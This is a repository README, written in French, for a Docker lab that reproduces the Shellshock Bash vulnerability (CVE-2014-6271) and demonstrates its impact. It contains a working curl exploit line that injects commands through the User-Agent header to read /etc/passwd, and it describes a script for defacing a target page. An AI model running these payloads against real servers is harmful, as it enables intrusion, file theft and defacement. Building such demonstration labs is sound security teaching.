# CVE-2014-6271 **Repository Path**: AJay13/CVE-2014-6271 ## Basic Information - **Project Name**: CVE-2014-6271 - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: main - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2025-01-04 - **Last Updated**: 2025-01-04 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # CVE-2014-6271 ## Description Ce projet permet de reproduire la vulnérabilité **CVE-2014-6271**, également connue sous le nom de **Shellshock**. Shellshock est une vulnérabilité de sécurité dans Bash qui permet d'exécuter du code malveillant via des variables d'environnement. Le but de ce projet est de démontrer l'impact de cette vulnérabilité sur un environnement Docker. ## Prérequis Avant de commencer, assurez-vous d'avoir Docker installé sur votre machine. Vous pouvez télécharger Docker [ici](https://www.docker.com/get-started). ## Installation et lancement ### 1. Construire l'image Docker Dans le répertoire du projet, construisez l'image Docker en exécutant la commande suivante : ```bash docker build -t ['image name'] . ``` Remplacez `['image name']` par le nom que vous souhaitez donner à l'image Docker. ### 2. Lancer le conteneur Docker Une fois l'image construite, lancez un conteneur à partir de cette image avec la commande suivante : ```bash docker run -it --rm -p 8080:80 ['image name'] ``` Cela exposera le service sur le port 8080 de votre machine locale. ### 3. Accéder à l'application Ouvrez votre navigateur et accédez à `http://localhost:8080`. Vous pourrez observer le comportement de l'application et tester la vulnérabilité. ### 4-1. Exploiter la vulnérabilité Dans un autre terminal, exécutez la commande suivante pour exploiter la vulnérabilité et lire le contenu du fichier `/etc/passwd` : ```bash curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \ http://localhost:8080/cgi-bin/vulnerable ``` Cette commande envoie un en-tête `user-agent` spécialement conçu pour exploiter Shellshock. Si la vulnérabilité est correctement reproduite, le contenu de `/etc/passwd` s'affichera dans la sortie du terminal. ### 4-2. Exploiter la vulnérabilité (script exp_deface.sh) Ce script permet d'exploiter la pour défacer une page web cible. La vulnérabilité repose sur une mauvaise configuration de scripts CGI, qui permet l'exécution de commandes arbitraires sur le serveur. Pré-requis : Assurez-vous que la cible est vulnérable au bug ShellShock. Assurez-vous d'avoir les permissions nécessaires pour tester l'exploit sur cette cible. ```bash ./exp_deface.sh ./exp_deface.sh localhost 8080 ``` ## Sécurité **Important :** Cette vulnérabilité ne doit être utilisée qu'à des fins de test et de démonstration dans un environnement contrôlé. N'utilisez pas ce projet dans des environnements de production.